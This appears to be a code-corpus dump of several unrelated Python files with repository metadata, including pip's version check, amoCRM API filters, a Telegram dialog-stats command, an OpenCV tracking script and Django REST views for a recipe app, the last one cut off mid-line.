# -*- coding: utf-8 -*- # Copyright (c) 2017, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document class RoleProfile(Document): def autoname(self): """set name as Role Profile name""" self.name = self.role_profile def on_update(self): """Changes in role_profile reflected across all its user""" users = frappe.get_all("User", filters={"role_profile_name": self.name}) roles = [role.role for role in self.roles] for d in users: user = frappe.get_doc("User", d) user.set("roles", []) user.add_roles(*roles)
27.666667
74
0.721386
from __future__ import unicode_literals import frappe from frappe.model.document import Document class RoleProfile(Document): def autoname(self): self.name = self.role_profile def on_update(self): users = frappe.get_all("User", filters={"role_profile_name": self.name}) roles = [role.role for role in self.roles] for d in users: user = frappe.get_doc("User", d) user.set("roles", []) user.add_roles(*roles)
true
true
f705d8e2048ebd543efcfc2b8d5258b47b62b213
162
py
Python
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
1
2021-08-14T17:59:21.000Z
2021-08-14T17:59:21.000Z
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
4
2020-02-12T21:30:44.000Z
2020-04-15T20:06:46.000Z
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
null
null
null
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import ( FooType, MyType, Root, ) __all__ = [ "FooType", "MyType", "Root", ]
13.5
68
0.617284
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import ( FooType, MyType, Root, ) __all__ = [ "FooType", "MyType", "Root", ]
true
true
f705db97cc2202b63ed43321fb14e2dd46519851
1,758
py
Python
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
import datetime class Filter: def __init__(self, name): self._name = name def _as_params(self): return {} class SingleFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}]".format(self._name): self._value} class SingleListFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}][]".format(self._name): self._value} class MultiFilter(Filter): def __call__(self, values): self._values = values return self def _as_params(self): return {"filter[{}][0]".format(self._name): self._values} class RangeFilter(Filter): def __call__(self, value_from, value_to): self._value_from = value_from self._value_to = value_to return self def _as_params(self): return { "filter[{}][from]".format(self._name): self._value_from, "filter[{}][to]".format(self._name): self._value_to, } class DateRangeFilter(RangeFilter): def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime): self._value_from = int(value_from.timestamp()) self._value_to = int(value_to.timestamp()) return self class EventsFiltersByPipelineAndStatus(Filter): def __call__(self, pipline_id, status_id): self._pipline_id = pipline_id self._status_id = status_id return self def _as_params(self): return { "filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id, "filter[value_before][leads_statuses][0][status_id]": self._status_id }
25.478261
85
0.633106
import datetime class Filter: def __init__(self, name): self._name = name def _as_params(self): return {} class SingleFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}]".format(self._name): self._value} class SingleListFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}][]".format(self._name): self._value} class MultiFilter(Filter): def __call__(self, values): self._values = values return self def _as_params(self): return {"filter[{}][0]".format(self._name): self._values} class RangeFilter(Filter): def __call__(self, value_from, value_to): self._value_from = value_from self._value_to = value_to return self def _as_params(self): return { "filter[{}][from]".format(self._name): self._value_from, "filter[{}][to]".format(self._name): self._value_to, } class DateRangeFilter(RangeFilter): def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime): self._value_from = int(value_from.timestamp()) self._value_to = int(value_to.timestamp()) return self class EventsFiltersByPipelineAndStatus(Filter): def __call__(self, pipline_id, status_id): self._pipline_id = pipline_id self._status_id = status_id return self def _as_params(self): return { "filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id, "filter[value_before][leads_statuses][0][status_id]": self._status_id }
true
true
f705dbc83088bdd8282fa9e38c778f2f552bec1f
6,550
py
Python
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
import datetime import hashlib import json import logging import os.path import sys from typing import TYPE_CHECKING from pip._vendor.packaging.version import parse as parse_version from pip._internal.index.collector import LinkCollector from pip._internal.index.package_finder import PackageFinder from pip._internal.metadata import get_default_environment from pip._internal.models.selection_prefs import SelectionPreferences from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace from pip._internal.utils.misc import ensure_dir if TYPE_CHECKING: import optparse from typing import Any, Dict from pip._internal.network.session import PipSession SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ" logger = logging.getLogger(__name__) def _get_statefile_name(key): # type: (str) -> str key_bytes = key.encode() name = hashlib.sha224(key_bytes).hexdigest() return name class SelfCheckState: def __init__(self, cache_dir): # type: (str) -> None self.state = {} # type: Dict[str, Any] self.statefile_path = None # Try to load the existing state if cache_dir: self.statefile_path = os.path.join( cache_dir, "selfcheck", _get_statefile_name(self.key) ) try: with open(self.statefile_path, encoding="utf-8") as statefile: self.state = json.load(statefile) except (OSError, ValueError, KeyError): # Explicitly suppressing exceptions, since we don't want to # error out if the cache file is invalid. pass @property def key(self): # type: () -> str return sys.prefix def save(self, pypi_version, current_time): # type: (str, datetime.datetime) -> None # If we do not have a path to cache in, don't bother saving. if not self.statefile_path: return # Check to make sure that we own the directory if not check_path_owner(os.path.dirname(self.statefile_path)): return # Now that we've ensured the directory is owned by this user, we'll go # ahead and make sure that all our directories are created. ensure_dir(os.path.dirname(self.statefile_path)) state = { # Include the key so it's easy to tell which pip wrote the # file. "key": self.key, "last_check": current_time.strftime(SELFCHECK_DATE_FMT), "pypi_version": pypi_version, } text = json.dumps(state, sort_keys=True, separators=(",", ":")) with adjacent_tmp_file(self.statefile_path) as f: f.write(text.encode()) try: # Since we have a prefix-specific state file, we can just # overwrite whatever is there, no need to check. replace(f.name, self.statefile_path) except OSError: # Best effort. pass def was_installed_by_pip(pkg): # type: (str) -> bool """Checks whether pkg was installed by pip This is used not to display the upgrade message when pip is in fact installed by system package manager, such as dnf on Fedora. """ dist = get_default_environment().get_distribution(pkg) return dist is not None and "pip" == dist.installer def pip_self_version_check(session, options): # type: (PipSession, optparse.Values) -> None """Check for an update for pip. Limit the frequency of checks to once per week. State is stored either in the active virtualenv or in the user's USER_CACHE_DIR keyed off the prefix of the pip script path. """ installed_dist = get_default_environment().get_distribution("pip") if not installed_dist: return pip_version = installed_dist.version pypi_version = None try: state = SelfCheckState(cache_dir=options.cache_dir) current_time = datetime.datetime.utcnow() # Determine if we need to refresh the state if "last_check" in state.state and "pypi_version" in state.state: last_check = datetime.datetime.strptime( state.state["last_check"], SELFCHECK_DATE_FMT ) if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60: pypi_version = state.state["pypi_version"] # Refresh the version if we need to or just see if we need to warn if pypi_version is None: # Lets use PackageFinder to see what the latest pip version is link_collector = LinkCollector.create( session, options=options, suppress_no_index=True, ) # Pass allow_yanked=False so we don't suggest upgrading to a # yanked version. selection_prefs = SelectionPreferences( allow_yanked=False, allow_all_prereleases=False, # Explicitly set to False ) finder = PackageFinder.create( link_collector=link_collector, selection_prefs=selection_prefs, ) best_candidate = finder.find_best_candidate("pip").best_candidate if best_candidate is None: return pypi_version = str(best_candidate.version) # save that we've performed a check state.save(pypi_version, current_time) remote_version = parse_version(pypi_version) local_version_is_older = ( pip_version < remote_version and pip_version.base_version != remote_version.base_version and was_installed_by_pip('pip') ) # Determine if our pypi_version is older if not local_version_is_older: return # We cannot tell how the current pip is available in the current # command context, so be pragmatic here and suggest the command # that's always available. This does not accommodate spaces in # `sys.executable`. pip_cmd = f"{sys.executable} -m pip" logger.warning( "You are using pip version %s; however, version %s is " "available.\nYou should consider upgrading via the " "'%s install --upgrade pip' command.", pip_version, pypi_version, pip_cmd ) except Exception: logger.debug( "There was an error checking the latest version of pip", exc_info=True, )
33.937824
87
0.630382
import datetime import hashlib import json import logging import os.path import sys from typing import TYPE_CHECKING from pip._vendor.packaging.version import parse as parse_version from pip._internal.index.collector import LinkCollector from pip._internal.index.package_finder import PackageFinder from pip._internal.metadata import get_default_environment from pip._internal.models.selection_prefs import SelectionPreferences from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace from pip._internal.utils.misc import ensure_dir if TYPE_CHECKING: import optparse from typing import Any, Dict from pip._internal.network.session import PipSession SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ" logger = logging.getLogger(__name__) def _get_statefile_name(key): key_bytes = key.encode() name = hashlib.sha224(key_bytes).hexdigest() return name class SelfCheckState: def __init__(self, cache_dir): self.state = {} self.statefile_path = None if cache_dir: self.statefile_path = os.path.join( cache_dir, "selfcheck", _get_statefile_name(self.key) ) try: with open(self.statefile_path, encoding="utf-8") as statefile: self.state = json.load(statefile) except (OSError, ValueError, KeyError): # error out if the cache file is invalid. pass @property def key(self): # type: () -> str return sys.prefix def save(self, pypi_version, current_time): # type: (str, datetime.datetime) -> None # If we do not have a path to cache in, don't bother saving. if not self.statefile_path: return if not check_path_owner(os.path.dirname(self.statefile_path)): return ensure_dir(os.path.dirname(self.statefile_path)) state = { # file. "key": self.key, "last_check": current_time.strftime(SELFCHECK_DATE_FMT), "pypi_version": pypi_version, } text = json.dumps(state, sort_keys=True, separators=(",", ":")) with adjacent_tmp_file(self.statefile_path) as f: f.write(text.encode()) try: # Since we have a prefix-specific state file, we can just # overwrite whatever is there, no need to check. replace(f.name, self.statefile_path) except OSError: # Best effort. pass def was_installed_by_pip(pkg): # type: (str) -> bool dist = get_default_environment().get_distribution(pkg) return dist is not None and "pip" == dist.installer def pip_self_version_check(session, options): # type: (PipSession, optparse.Values) -> None installed_dist = get_default_environment().get_distribution("pip") if not installed_dist: return pip_version = installed_dist.version pypi_version = None try: state = SelfCheckState(cache_dir=options.cache_dir) current_time = datetime.datetime.utcnow() # Determine if we need to refresh the state if "last_check" in state.state and "pypi_version" in state.state: last_check = datetime.datetime.strptime( state.state["last_check"], SELFCHECK_DATE_FMT ) if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60: pypi_version = state.state["pypi_version"] # Refresh the version if we need to or just see if we need to warn if pypi_version is None: # Lets use PackageFinder to see what the latest pip version is link_collector = LinkCollector.create( session, options=options, suppress_no_index=True, ) # Pass allow_yanked=False so we don't suggest upgrading to a selection_prefs = SelectionPreferences( allow_yanked=False, allow_all_prereleases=False, ) finder = PackageFinder.create( link_collector=link_collector, selection_prefs=selection_prefs, ) best_candidate = finder.find_best_candidate("pip").best_candidate if best_candidate is None: return pypi_version = str(best_candidate.version) state.save(pypi_version, current_time) remote_version = parse_version(pypi_version) local_version_is_older = ( pip_version < remote_version and pip_version.base_version != remote_version.base_version and was_installed_by_pip('pip') ) # Determine if our pypi_version is older if not local_version_is_older: return # We cannot tell how the current pip is available in the current # command context, so be pragmatic here and suggest the command # that's always available. This does not accommodate spaces in pip_cmd = f"{sys.executable} -m pip" logger.warning( "You are using pip version %s; however, version %s is " "available.\nYou should consider upgrading via the " "'%s install --upgrade pip' command.", pip_version, pypi_version, pip_cmd ) except Exception: logger.debug( "There was an error checking the latest version of pip", exc_info=True, )
true
true
f705dc263f4b173513dc6e8e38729cebb3b5b1ae
259
py
Python
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
3
2018-03-16T07:00:42.000Z
2022-03-27T00:39:55.000Z
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
16
2016-08-12T18:51:04.000Z
2021-04-16T16:14:07.000Z
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
6
2015-11-04T15:53:49.000Z
2020-06-25T18:34:47.000Z
from treehopper.libraries.displays import LedDriver from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver): def __init__(self): super().__init__()
32.375
88
0.822394
from treehopper.libraries.displays import LedDriver from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver): def __init__(self): super().__init__()
true
true
f705dc6351fae60f5584a9468074494232907552
1,250
py
Python
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
2
2020-07-25T17:58:55.000Z
2020-11-26T10:54:46.000Z
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
null
null
null
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
2
2020-08-03T09:09:06.000Z
2020-08-12T05:05:24.000Z
from userbot import bot from telethon import events import asyncio from datetime import datetime from telethon.tl.types import User, Chat, Channel from uniborg.util import admin_cmd @bot.on(admin_cmd(pattern=r"stats")) async def _(event): if event.fwd_from: return start = datetime.now() u = 0 g = 0 c = 0 bc = 0 b = 0 dialogs = await bot.get_dialogs( limit=None, ignore_migrated=True ) for d in dialogs: currrent_entity = d.entity if type(currrent_entity) is User: if currrent_entity.bot: b += 1 else: u += 1 elif type(currrent_entity) is Chat: g += 1 elif type(currrent_entity) is Channel: if currrent_entity.broadcast: bc += 1 else: c += 1 else: print(d) end = datetime.now() ms = (end - start).seconds await event.edit(""" ================================= `Your Stats Obtained in {} seconds` `You have {} Private Messages` `You are in {} Groups` `You are in {} Super Groups` `You Are in {} Channels` `And finally Bots = {}` ===================================""".format(ms, u, g, c, bc, b))
25.510204
66
0.5312
from userbot import bot from telethon import events import asyncio from datetime import datetime from telethon.tl.types import User, Chat, Channel from uniborg.util import admin_cmd @bot.on(admin_cmd(pattern=r"stats")) async def _(event): if event.fwd_from: return start = datetime.now() u = 0 g = 0 c = 0 bc = 0 b = 0 dialogs = await bot.get_dialogs( limit=None, ignore_migrated=True ) for d in dialogs: currrent_entity = d.entity if type(currrent_entity) is User: if currrent_entity.bot: b += 1 else: u += 1 elif type(currrent_entity) is Chat: g += 1 elif type(currrent_entity) is Channel: if currrent_entity.broadcast: bc += 1 else: c += 1 else: print(d) end = datetime.now() ms = (end - start).seconds await event.edit(""" ================================= `Your Stats Obtained in {} seconds` `You have {} Private Messages` `You are in {} Groups` `You are in {} Super Groups` `You Are in {} Channels` `And finally Bots = {}` ===================================""".format(ms, u, g, c, bc, b))
true
true
f705dd4832b18fd425450cd30cdfb3cf0a126a5e
5,623
py
Python
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
# This file will track detections import tqdm import cv2 import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.ticker import NullLocator from cs231aApproachingOdt import utils as myutils from PIL import Image import os import torch import torchvision.ops.boxes as bops def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)): prev_range = [*range(len(prev_detection))] new_range = [*range(len(new_detection))] permutations = myutils.unique_permutations(prev_range, new_range) fig, ax = plt.subplots(1, 2) prev_img = myutils.load_resize(prev_path, size) new_img = myutils.load_resize(new_path, size) matching_pairs = [] for old, new in permutations: [a.cla() for a in ax] draw_detection(prev_img, prev_detection[old], ax[0]) ax[0].set_title(f"{os.path.basename(prev_path)}") draw_detection(new_img, new_detection[new], ax[1]) ax[1].set_title(f"{os.path.basename(new_path)}") #plt.pause(0.1) iou = get_iou(prev_detection[old], new_detection[new]) if iou < 0.7: continue prev_crop = crop_detection(prev_img, prev_detection[old]) new_crop = crop_detection(new_img, new_detection[new]) #keypoint_matching(prev_crop, new_crop) methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'] is_match = template_matching(new_crop, prev_crop, methods[3]) if is_match == True: matching_pairs.append((old, new)) plt.close(fig) return matching_pairs def get_iou(prev_detection, new_detection): box1 = new_detection[:4].reshape((1, 4)) box2 = prev_detection[:4].reshape((1, 4)) iou = bops.box_iou(box1, box2) return iou def template_matching(img1, template, method): fig_template, ax = plt.subplots() template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY) img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img = img1_gray.copy() w_t, h_t = template_gray.shape[::-1] w_i, h_i = img1_gray.shape[::-1] if (w_t > w_i) or (h_t > h_i): return False method = eval(method) # Apply template Matching res = cv2.matchTemplate(img1_gray, template_gray, method) min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res) #print(f"\n{min_val}, {max_val}, {min_loc}, {max_loc}") # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]: top_left = min_loc else: top_left = max_loc # bottom_right = (top_left[0] + w, top_left[1] + h) # cv2.rectangle(img, top_left, bottom_right, 255, 2) # plt.subplot(121), plt.imshow(res, cmap='gray') # plt.title('Matching Result'), plt.xticks([]), plt.yticks([]) # plt.subplot(122), plt.imshow(img, cmap='gray') # plt.title('Detected Point'), plt.xticks([]), plt.yticks([]) # plt.suptitle(method) # plt.show() # plt.close(fig_template) if max_val > 0.9: return True else: return False def keypoint_matching(img1, img2): # Source: https://docs.opencv.org/master/dc/dc3/tutorial_py_matcher.html img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY) myutils.show(img1_gray) orb = cv2.ORB_create() # find the keypoints and descriptors with ORB kp1, des1 = orb.detectAndCompute(img1_gray, None) kp2, des2 = orb.detectAndCompute(img2_gray, None) # create BFMatcher object bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) # Match descriptors. matches = bf.match(des1, des2) # Sort them in the order of their distance. matches = sorted(matches, key=lambda x: x.distance) # Draw first 10 matches. img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS) fig_match, ax_match = plt.subplot() plt.imshow(img3) plt.show() plt.close(fig_match) def crop_detection(img, detection): x1, y1, x2, y2, conf, cls_conf, cls_pred = detection crop = img[int(y1):int(y2), int(x1):int(x2)] return crop def draw_detection(img, detection, ax): ax.imshow(myutils.bgr2rgb(img)) x1, y1, x2, y2, conf, cls_conf, cls_pred = detection box_w = x2 - x1 box_h = y2 - y1 # Create a Rectangle patch bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none") # Add the bbox to the plot ax.add_patch(bbox) ax.set_xticks([]) ax.set_yticks([]) def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)): # Iterate through images and save plot of detections print("In Tracking By Detection") path_detections_zip = zip(image_paths, img_detections) num_images = len(image_paths) tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images) tracks_dict = dict() for img_i, (path, detections) in enumerate(tqdm_pbar): tqdm_pbar.set_postfix({"Processing ": path}) if img_i == 0: print("Initialize Detections") continue matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1], new_path=path, new_detection=detections, size=size) print(matching_pairs) tracks_dict[path] = matching_pairs myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections)) return tracks_dict
35.588608
119
0.676685
import tqdm import cv2 import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.ticker import NullLocator from cs231aApproachingOdt import utils as myutils from PIL import Image import os import torch import torchvision.ops.boxes as bops def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)): prev_range = [*range(len(prev_detection))] new_range = [*range(len(new_detection))] permutations = myutils.unique_permutations(prev_range, new_range) fig, ax = plt.subplots(1, 2) prev_img = myutils.load_resize(prev_path, size) new_img = myutils.load_resize(new_path, size) matching_pairs = [] for old, new in permutations: [a.cla() for a in ax] draw_detection(prev_img, prev_detection[old], ax[0]) ax[0].set_title(f"{os.path.basename(prev_path)}") draw_detection(new_img, new_detection[new], ax[1]) ax[1].set_title(f"{os.path.basename(new_path)}") iou = get_iou(prev_detection[old], new_detection[new]) if iou < 0.7: continue prev_crop = crop_detection(prev_img, prev_detection[old]) new_crop = crop_detection(new_img, new_detection[new]) methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'] is_match = template_matching(new_crop, prev_crop, methods[3]) if is_match == True: matching_pairs.append((old, new)) plt.close(fig) return matching_pairs def get_iou(prev_detection, new_detection): box1 = new_detection[:4].reshape((1, 4)) box2 = prev_detection[:4].reshape((1, 4)) iou = bops.box_iou(box1, box2) return iou def template_matching(img1, template, method): fig_template, ax = plt.subplots() template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY) img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img = img1_gray.copy() w_t, h_t = template_gray.shape[::-1] w_i, h_i = img1_gray.shape[::-1] if (w_t > w_i) or (h_t > h_i): return False method = eval(method) res = cv2.matchTemplate(img1_gray, template_gray, method) min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res) if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]: top_left = min_loc else: top_left = max_loc if max_val > 0.9: return True else: return False def keypoint_matching(img1, img2): img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY) myutils.show(img1_gray) orb = cv2.ORB_create() kp1, des1 = orb.detectAndCompute(img1_gray, None) kp2, des2 = orb.detectAndCompute(img2_gray, None) bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) matches = bf.match(des1, des2) matches = sorted(matches, key=lambda x: x.distance) img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS) fig_match, ax_match = plt.subplot() plt.imshow(img3) plt.show() plt.close(fig_match) def crop_detection(img, detection): x1, y1, x2, y2, conf, cls_conf, cls_pred = detection crop = img[int(y1):int(y2), int(x1):int(x2)] return crop def draw_detection(img, detection, ax): ax.imshow(myutils.bgr2rgb(img)) x1, y1, x2, y2, conf, cls_conf, cls_pred = detection box_w = x2 - x1 box_h = y2 - y1 bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none") ax.add_patch(bbox) ax.set_xticks([]) ax.set_yticks([]) def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)): print("In Tracking By Detection") path_detections_zip = zip(image_paths, img_detections) num_images = len(image_paths) tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images) tracks_dict = dict() for img_i, (path, detections) in enumerate(tqdm_pbar): tqdm_pbar.set_postfix({"Processing ": path}) if img_i == 0: print("Initialize Detections") continue matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1], new_path=path, new_detection=detections, size=size) print(matching_pairs) tracks_dict[path] = matching_pairs myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections)) return tracks_dict
true
true
f705de5dde82e6bd54b2dfd92a538123dac03a9b
105
py
Python
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
54
2019-04-16T23:24:48.000Z
2021-12-18T11:41:50.000Z
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
3
2019-05-19T15:19:41.000Z
2020-04-27T16:29:16.000Z
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
49
2020-11-25T23:29:16.000Z
2022-03-26T16:20:24.000Z
# Tot's reward lv 40 sm.completeQuest(5521) # Lv. 40 Equipment box sm.giveItem(2431877, 1) sm.dispose()
15
23
0.72381
sm.completeQuest(5521) # Lv. 40 Equipment box sm.giveItem(2431877, 1) sm.dispose()
true
true
f705de767d15e8ccdef551f1fa42f380207c8feb
11,462
py
Python
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
1
2021-12-14T14:43:51.000Z
2021-12-14T14:43:51.000Z
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
null
null
null
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
null
null
null
import csv from django.contrib.auth import get_user_model from django.db.models.aggregates import Sum from django.http.response import HttpResponse from django.utils.decorators import method_decorator from djoser.serializers import SetPasswordSerializer from djoser.views import TokenCreateView from drf_yasg.utils import swagger_auto_schema from rest_framework import filters, status from rest_framework.decorators import action from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.viewsets import ModelViewSet from api import serializers from api.decorators import multi_method_decorator from api.docs.schemas import (EmptyAutoSchema, follower_params, recipe_request_body) from api.filters import GlobalFilterBackend from api.pagination import FollowPagination, LimitPagination from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm, IsAdminOrReadOnly, RecipePermission) from food.models import Ingredient, IngredientInRecipe, Recipe, Tag from interactions.models import Favorite, Follow, Purchase User = get_user_model() class CustomTokenCreateView(TokenCreateView): def _action(self, serializer): response = super()._action(serializer) response.status_code = status.HTTP_201_CREATED return response @multi_method_decorator( names=['update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class CustomUserViewSet(ModelViewSet): queryset = User.objects.all().order_by('id') serializer_class = serializers.CustomUserSerializer pagination_class = LimitPagination permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,) def get_serializer_class(self): if self.action in ('list', 'retrieve', 'me'): return serializers.CustomUserGetSerializer elif self.action == 'set_password': return SetPasswordSerializer elif self.action == 'subscriptions': return serializers.SubscriptionsSerializer elif self.action == 'subscribe': return serializers.FollowSerializer return self.serializer_class @action(['get'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(auto_schema=EmptyAutoSchema) def me(self, request, pk=None): serializer = self.get_serializer(self.request.user) return Response(serializer.data, status=status.HTTP_200_OK) @action(['post'], detail=False, permission_classes=(IsAuthenticated,)) @swagger_auto_schema(request_body=SetPasswordSerializer, responses={204: 'No Content'}) def set_password(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.request.user.set_password( serializer.validated_data['new_password'] ) self.request.user.save() return Response(status=status.HTTP_204_NO_CONTENT) @action(['get'], detail=False, pagination_class=FollowPagination, permission_classes=[IsAuthenticated]) @swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer}) def subscriptions(self, request): queryset = Follow.objects.filter(user=request.user) if not queryset.exists(): return Response({'error': 'Вы еще ни на кого не подписаны'}, status=status.HTTP_400_BAD_REQUEST) page = self.paginate_queryset(queryset) if page: serializer = self.get_serializer( page, many=True, context={'request': request} ) return self.get_paginated_response(serializer.data) serializer = self.get_serializer(queryset, many=True, context={'request': request}) return Response(serializer.data) @action(['get'], detail=True, permission_classes=[IsAuthenticated]) @swagger_auto_schema(manual_parameters=follower_params, responses={201: serializers.SubscriptionsSerializer}) def subscribe(self, request, pk=None): user, author = self.following_validate(request, pk) if not author: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) data = {'user': user.id, 'author': author.id} serializer = self.get_serializer( data=data, context={'request': request} ) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data, status=status.HTTP_201_CREATED) @subscribe.mapping.delete def delete_subscribe(self, request, pk=None): user, author, subscribe = self.following_validate(request, pk, delete=True) if not author or not subscribe: return Response({'error': user}, status=status.HTTP_400_BAD_REQUEST) subscribe.delete() return Response(status=status.HTTP_204_NO_CONTENT) def following_validate(self, request, pk, delete=False): user = request.user if not User.objects.filter(id=pk).exists(): if delete: return 'Такого пользователя еще нет', False, False return 'Такого пользователя еще нет', False author = get_object_or_404(User, id=pk) if delete: if not 